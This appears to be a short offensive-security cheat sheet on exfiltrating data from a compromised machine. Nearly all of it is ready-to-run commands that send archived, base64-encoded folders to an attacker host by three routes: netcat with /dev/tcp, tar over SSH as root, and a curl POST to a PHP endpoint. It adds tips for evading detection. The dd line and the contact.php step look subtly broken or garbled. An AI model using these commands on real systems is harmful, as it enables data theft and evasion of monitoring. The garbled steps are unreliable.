Data Exfiltration
- Exfil over TCP Socket with EBCDIC and Base64
First open a listener on attacker machine:
nc -lvnp 80 > datafolder.tmp
On target system:
tar zcf - /tmp/datafolder | base64 | dd conv=ebcdic /dev/tcp/<attackerIP>/80
Now decode the information on the attacker machine:
dd conv=ascii if=datafolder.tmp | base64 -d > datafolder.tar
tar xf datafolder.tar
- Exfil over SSH
Since SSH is encrypted it is less likely to be caught doing this
On target system:
tar zcf - /tmp/datafolder | ssh root@<attacker_ip> "cd /tmp; tar zxpf -"
On attacker machine:
The information is ready to view in the tmp/datafolder
If we want to be really stealthy we can configure ssh to use port 80, incase port 22 is being monitored
- Exfil via POST Request over HTTPS
On attacker machine:
Make a contact.php file in /tmp/datafolder.base64
On victim machine:
curl --data "$(tar zcf - /tmp/datafolder | base64)" https://<attacker_ip>/contact.php
On attacker machine:
cat /tmp/datafolder.base64 | base64 -d > datafolder.tar && tar xf datafolder.tar
Last updated